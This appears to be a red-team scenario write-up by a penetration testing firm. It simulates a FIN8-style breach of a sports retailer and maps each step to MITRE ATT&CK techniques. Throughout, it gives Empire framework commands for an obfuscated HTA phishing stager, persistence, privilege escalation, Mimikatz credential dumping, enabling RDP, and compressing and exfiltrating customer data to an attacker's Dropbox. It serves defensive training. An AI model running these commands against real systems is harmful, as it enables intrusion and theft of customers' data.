Motivation
The motives behind cyber attacks against companies in the retail industry are mainly financial. The nature of this sector requires big digital presence with e-commerce and mobile applications that enable consumers to buy products. Payment card details of customers are also processed or stored to perform payment transactions which makes retail companies an attractive target for cyber criminals and threat actors.
Scenario
A sports retailer that is selling footwear and sport equipment is inside the focus of a threat group that is known from previous cyber-attacks in the retail industry. The threat group is launching a tailored spear-phishing link campaign in an attempt to gain initial access into the target network and steal personally identifiable information (PII) or payment card details that could be sold to the highest bidder in the dark web or used by the group for financial gain.
Tactics
Various tactics are used during the cyber attack by the threat actor in order to achieve their objectives. Every cyber attack is followed by the same procedures but with different tactics depending on the open source intelligence results and the configuration of the environments. The tactics used in this scenario are demonstrated below.
Spear-phishing Link
The threat actor crafts a malicious HTML application (HTA) that will executed on the systems of the target users if they download and run the file. Obfuscation is used in the code to evade detection from the endpoint of the user’s.
usestager windows/hta
set Listener http
set Obfuscate All
execute
Use Execution – PowerShell
The adversary sent the email that contains the link to the HTA file to a group of employees that they have high probability to click the file. (non technical people). A user click the hyperlink on the email, download and execute the HTA.
The HTA file contains code which is written in PowerShell a scripting language that is supported in Windows environments from Windows 7 until Windows 10. Once the code is executed the adversary will gain initial foothold into the network of the sports retailer.
Scheduled Task
The threat actor is using the schtasks utility directly from the Command and Control (C2) to create persistence on the compromised host. An arbitrary PowerShell payload that is stored in a registry key will executed on a daily basis at 09:00 am to maintain the communication between the threat actor infrastructure and the target network.
usemodule persistence/userland/schtasks
set Listener http
execute
Exploitation for Privilege Escalation
A recon on the compromised host is conducted to enumerate privilege escalation opportunities. The threat actor identifies one service that is running with SYSTEM level privileges and is configured with weak permissions. The group modifies the binary path of the service in order to execute an arbitrary payload the next time the service starts.
usemodule privesc/powerup/service_stager
set Listener http
set ServiceName pentestlab
execute
The adversary acquires elevated privileges (SYSTEM) when the service is restarted.
File Deletion
Files that were dropped during the operation are deleted to clean up traces that could lead the organisation to discover the breach at an early stage and before the operation is finished.
Credential Dumping
Passwords that are stored in memory of the operation system are retrieved in plain-text for lateral movement inside the network. A PowerShell variation of Mimikatz (common hacking tool) is used to execute this technique.
usemodule credentials/mimikatz/logonpasswords*
The results will return the usernames and passwords of users that have previously authenticated with the system. These credentials can lead to access other systems in the network by using protocols such as SMB, WMI and RDP.
Remote System Discovery
Windows trusted binaries are dropped into disk to assist with the discovery of other systems in the network that will be used for lateral movement. Usage of these tools evades detection as it is legitimate Active Directory functionality. The adversary discovers various assets (Domain Controller, Exchange, Hosts etc.) that exist in the network.
shell .\dsquery.exe computer
Remote Desktop Protocol
Administrators are heavily use Remote Desktop Protocol to connect with workstations and servers remotely to troubleshoot issues or perform other operations. The threat actor enables RDP on the compromised systems in order to maintain a connection and move laterally across a number of systems over a trusted protocol.
use powershell/management/enable_rdp
execute
The adversary can authenticate with the systems that have RDP enabled with their standard user or elevated credentials.
rdesktop 10.0.2.30
During the access further information and sensitive documents that are stored in local drives are being retrieved and evaluated by the group.
Data Staged
At this point interesting data that could be sold in the dark net or used for financial fraud are collected into a single location. An excel file that contains thousands of customer records is moved into a specific folder.
Commonly Used Port
The communication channel between the Command and Control (C2) and the network is performed through a common port 80 (HTTP) in order to blend in with normal network activity.
Data Compressed
The acquired data that contain sensitive information of customer records are being compressed into one zip file for portability reasons and to reduce the data sent over the network during ex-filtration that will alert the Data Loss Prevention (DLP) solution.
usemodule management/zipfolder
set Folder C:\temp\exfil
set ZipFileName C:\temp\exfil.zip
execute
Ex-filtration Over Alternative Protocol
Data are being ex-filtrated into the Dropbox account of the threat actor. This is a common tactic to avoid the correlation between the command and control infrastructure and the stolen data. The communication is performed through the Dropbox API key.
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\temp\exfil.zip
set TargetFilePath /exfil/
set ApiKey <API Token>
execute
Business Impact
The loss of the customer data has serious implications into the company’s posture with huge fines due to General Data Protection Regulation (GDPR). Reputation damages will also occur as the breach will need to be publicized which will have as an effect lack of confidence for current and potential future customers that will choose other retail sport suppliers to buy goods. The lack of confidence towards the security posture of the company will have financial impact in the short and long term.
Summary
The purpose of this scenario was to demonstrate a cyber breach against a retail company by mimic the techniques of FIN8 threat actor. The group has used PowerShell for their operations in the previous years but their toolkit has evolved and recent cyber attacks indicate that their malware is focusing to infect point of sale (POS) systems. Organisations should be ready to defend against threats and red team assessments can assist to measure the resilience against cyber-attacks.
MITRE – ATT&CK
The following table contains the techniques that were used in this scenario and their associated Mitre ID.
| Procedure | Technique | Mitre |
| Initial Access | Spearphishing Link | T1192 |
| Execution | User Execution | T1204 |
| Execution | PowerShell | T1086 |
| Persistence | Scheduled Task | T1053 |
| Privilege Escalation | Exploitation for Privilege Escalation | T1068 |
| Defense Evasion | File Deletion | T1107 |
| Credential Access | Credential Dumping | T1003 |
| Discovery | Remote System Discovery | T1018 |
| Lateral Movement | Remote Desktop Protocol | T1076 |
| Collection | Data Staged | T1074 |
| Command and Control | Commonly Used Port | T1043 |
| Ex-filtration | Data Compressed | T1002 |
| Ex-filtration | Ex-filtration Over Alternative Protocol | T1048 |
If you are interested to learn more about how Pentest Laboratories and our custom cyber attack scenarios can improve your organisation readiness against cyber threats please contact us.
Pentest Laboratories 